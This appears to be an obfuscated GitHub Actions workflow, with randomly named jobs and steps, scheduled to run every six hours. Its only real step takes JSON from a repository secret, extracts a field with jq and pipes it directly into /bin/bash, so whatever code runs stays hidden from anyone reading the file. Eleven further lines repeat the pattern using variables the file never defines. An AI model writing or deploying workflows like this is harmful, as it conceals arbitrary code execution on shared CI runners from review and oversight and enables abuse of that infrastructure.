name: wangwudao1918
on:
  workflow_dispatch:
  schedule:
    - cron: '41 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangwudao1918
        env:
          oq0: ${{ secrets.oq0 }}
        run: |
          echo $oq0 | jq -r .qosnr23057 | /bin/bash
          echo $ojhe818 | jq -r .zuiys45 | /bin/bash
          echo $yxz2 | jq -r .nfe47 | /bin/bash
          echo $hgq7395 | jq -r .qgh6416 | /bin/bash
          echo $h80 | jq -r .fxwhy25 | /bin/bash
          echo $yp194 | jq -r .ovjv26 | /bin/bash
          echo $d97650 | jq -r .nxfil28218 | /bin/bash
          echo $nh4662 | jq -r .uxz767 | /bin/bash
          echo $lgaqy8 | jq -r .upkwi86084 | /bin/bash
          echo $r66684 | jq -r .nsmt8 | /bin/bash
          echo $tsj8 | jq -r .jeo5 | /bin/bash
          echo $xb272 | jq -r .z8 | /bin/bash

